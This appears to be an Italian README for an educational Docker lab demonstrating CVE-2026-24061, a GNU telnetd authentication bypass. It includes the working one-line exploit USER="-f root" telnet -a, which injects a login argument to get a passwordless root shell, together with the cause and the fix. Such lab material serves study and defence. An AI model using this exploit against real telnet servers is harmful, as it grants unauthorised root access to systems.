
# Laboratorio Docker didattico che dimostra CVE-2026-24061, un bypass dell'autenticazione in GNU telnetd che consente l'accesso root tramite l'iniezione di argomenti nella variabile d'ambiente USER.
Questo repository contiene un laboratorio Docker semplice per dimostrare la vulnerabilità CVE-2026-24061. Consente il bypass dell'autenticazione e l'accesso come root in GNU telnetd, su Linux.
L'obiettivo è esclusivamente educativo.
docker build -t cve-2026-24061 .
docker run -it -p 2323:23 cve-2026-24061
In un altro terminale, esegui:
USER="-f root" telnet -a localhost 2323
Dopo di che, l'accesso verrà concesso direttamente come root, senza richiesta di password.
Il difetto si verifica a causa di un'iniezione di argomenti durante l'invocazione dell'utilità /usr/bin/login. Il telnetd costruisce dinamicamente la riga di comando utilizzata per chiamare login e include il valore della variabile d'ambiente USER tramite il segnaposto %U, senza alcuna sanitizzazione.
Poiché l'utilità login accetta l'opzione -f, che ignora l'autenticazione tramite password, un attaccante può impostare USER="-f root" e forzare l'accesso diretto come root.
Poiché il telnetd viene eseguito con privilegi elevati, questa manipolazione risulta immediatamente in una shell root senza bisogno di credenziali valide. L'exploit è semplice, non richiede interazione preliminare e può essere facilmente automatizzato, il che giustifica il punteggio CVSS 9.8.
La vulnerabilità è stata corretta con l'introduzione della validazione e della sanitizzazione della variabile USER, bloccando i valori che iniziano con un trattino e i caratteri speciali, impedendo l'iniezione di argomenti in login.